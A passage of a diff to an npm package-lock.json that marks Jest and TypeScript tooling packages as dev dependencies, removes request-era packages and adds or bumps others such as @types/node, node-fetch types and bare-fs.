"sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", + "dev": true }, "@sinonjs/commons": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", + "dev": true, "requires": { "type-detect": "4.0.8" } @@ -4712,6 +4997,7 @@ "version": "10.3.0", "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", + "dev": true, "requires": { "@sinonjs/commons": "^3.0.0" } @@ -4720,6 +5006,7 @@ "version": "7.20.5", "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", + "dev": true, "requires": { "@babel/parser": "^7.20.7", "@babel/types": "^7.20.7", @@ -4732,6 +5019,7 @@ "version": "7.6.8", "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", + "dev": true, "requires": { "@babel/types": "^7.0.0" } @@ -4740,6 +5028,7 @@ "version": "7.4.4", "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", + "dev": true, "requires": { "@babel/parser": "^7.1.0", "@babel/types": "^7.0.0" @@ -4749,20 +5038,16 @@ "version": "7.20.6", "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", + "dev": true, "requires": { "@babel/types": "^7.20.7" } }, - "@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==", - "dev": true - }, "@types/graceful-fs": { "version": "4.1.9", "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", + "dev": true, "requires": { "@types/node": "*" } @@ -4770,12 +5055,14 @@ "@types/istanbul-lib-coverage": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==" + "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", + "dev": true }, "@types/istanbul-lib-report": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", + "dev": true, "requires": { "@types/istanbul-lib-coverage": "*" } @@ -4784,6 +5071,7 @@ "version": "3.0.1", "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", + "dev": true, "requires": { "@types/istanbul-lib-report": "*" } @@ -4792,6 +5080,7 @@ "version": "29.5.14", "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", + "dev": true, "requires": { "expect": "^29.0.0", "pretty-format": "^29.0.0" @@ -4804,40 +5093,34 @@ "dev": true }, "@types/node": { - "version": "20.17.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.10.tgz", - "integrity": "sha512-/jrvh5h6NXhEauFFexRin69nA0uHJ5gwk4iDivp/DeoEua3uwCUto6PC86IpRITBOs4+6i2I56K5x5b6WYGXHA==", + "version": "22.15.32", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.15.32.tgz", + "integrity": "sha512-3jigKqgSjsH6gYZv2nEsqdXfZqIFGAV36XYYjf9KGZ3PSG+IhLecqPnI310RvjutyMwifE2hhhNEklOUrvx/wA==", + "dev": true, "requires": { - "undici-types": "~6.19.2" + "undici-types": "~6.21.0" } }, - "@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", + "@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", "dev": true, "requires": { - "@types/caseless": "*", "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" + "form-data": "^4.0.0" } }, "@types/stack-utils": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==" - }, - "@types/tough-cookie": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.2.tgz", - "integrity": "sha512-Q5vtl1W5ue16D+nIaW8JWebSSraJVlK+EthKn7e7UcD4KWsaSJ8BqGPXNaPghgtcn/fhvrN17Tv8ksUsQpiplw==", + "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", "dev": true }, - "@types/ws": { - "version": "8.5.5", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.5.tgz", - "integrity": "sha512-lwhs8hktwxSjf9UaZ9tG5M03PGogvFaH8gUgLNbN9HKIg0dvv6q+gkSuJ8HN4/VbyxkuLzCjlN7GquQ0gUJfIg==", + "@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", "dev": true, "requires": { "@types/node": "*" @@ -4847,6 +5130,7 @@ "version": "17.0.24", "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", + "dev": true, "requires": { "@types/yargs-parser": "*" } @@ -4854,24 +5138,20 @@ "@types/yargs-parser": { "version": "21.0.0", "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==" + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dev": true, - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } + "agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", + "dev": true }, "ansi-escapes": { "version": "4.3.2", "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "dev": true, "requires": { "type-fest": "^0.21.3" } @@ -4879,12 +5159,14 @@ "ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "dev": true }, "ansi-styles": { "version": "4.3.0", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, "requires": { "color-convert": "^2.0.1" } @@ -4893,6 +5175,7 @@ "version": "3.1.3", "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", + "dev": true, "requires": { "normalize-path": "^3.0.0", "picomatch": "^2.0.4" @@ -4904,25 +5187,11 @@ "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", "dev": true }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dev": true, - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", - "dev": true - }, "async": { "version": "3.2.6", "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==" + "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", + "dev": true }, "asynckit": { "version": "0.4.0", @@ -4930,22 +5199,17 @@ "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", "dev": true }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", - "dev": true - }, - "aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==", + "b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", "dev": true }, "babel-jest": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", + "dev": true, "requires": { "@jest/transform": "^29.7.0", "@types/babel__core": "^7.1.14", @@ -4960,6 +5224,7 @@ "version": "6.1.1", "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.0.0", "@istanbuljs/load-nyc-config": "^1.0.0", @@ -4972,6 +5237,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", + "dev": true, "requires": { "@babel/template": "^7.3.3", "@babel/types": "^7.3.3", @@ -4983,6 +5249,7 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", + "dev": true, "requires": { "@babel/plugin-syntax-async-generators": "^7.8.4", "@babel/plugin-syntax-bigint": "^7.8.3", @@ -5002,6 +5269,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", + "dev": true, "requires": { "babel-plugin-jest-hoist": "^29.6.3", "babel-preset-current-node-syntax": "^1.0.0" @@ -5010,21 +5278,60 @@ "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "dev": true }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", + "bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "dev": true, + "optional": true + }, + "bare-fs": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", + "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", + "dev": true, + "optional": true, + "requires": { + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" + } + }, + "bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "dev": true, + "optional": true + }, + "bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "dev": true, + "optional": true, + "requires": { + "bare-os": "^3.0.1" + } + }, + "bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", "dev": true, + "optional": true, "requires": { - "tweetnacl": "^0.14.3" + "streamx": "^2.21.0" } }, "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "version": "1.1.12", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", + "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", + "dev": true, "requires": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" @@ -5034,6 +5341,7 @@ "version": "3.0.3", "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", + "dev": true, "requires": { "fill-range": "^7.1.1" } @@ -5042,6 +5350,7 @@ "version": "4.24.2", "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", + "dev": true, "requires": { "caniuse-lite": "^1.0.30001669", "electron-to-chromium": "^1.5.41", @@ -5053,6 +5362,7 @@ "version": "0.2.6", "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", + "dev": true, "requires": { "fast-json-stable-stringify": "2.x" } @@ -5061,6 +5371,7 @@ "version": "2.1.1", "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", + "dev": true, "requires": { "node-int64": "^0.4.0" } @@ -5068,39 +5379,42 @@ "buffer-from": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==" - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==", + "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", "dev": true }, + "call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "dev": true, + "requires": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" + } + }, "callsites": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==" + "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "dev": true }, "camelcase": { "version": "5.3.1", "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==" + "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", + "dev": true }, "caniuse-lite": { "version": "1.0.30001680", "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==" - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==", + "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", "dev": true }, "chalk": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, "requires": { "ansi-styles": "^4.1.0", "supports-color": "^7.1.0" @@ -5109,28 +5423,26 @@ "char-regex": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==" - }, - "chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", + "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", "dev": true }, "ci-info": { "version": "3.8.0", "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==" + "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", + "dev": true }, "cjs-module-lexer": { "version": "1.4.1", "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==" + "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", + "dev": true }, "cliui": { "version": "8.0.1", "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "dev": true, "requires": { "string-width": "^4.2.0", "strip-ansi": "^6.0.1", @@ -5140,17 +5452,20 @@ "co": { "version": "4.6.0", "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==" + "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", + "dev": true }, "collect-v8-coverage": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==" + "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", + "dev": true }, "color-convert": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dev": true, "requires": { "color-name": "~1.1.4" } @@ -5158,7 +5473,8 @@ "color-name": { "version": "1.1.4", "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true }, "combined-stream": { "version": "1.0.8", @@ -5172,23 +5488,20 @@ "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", + 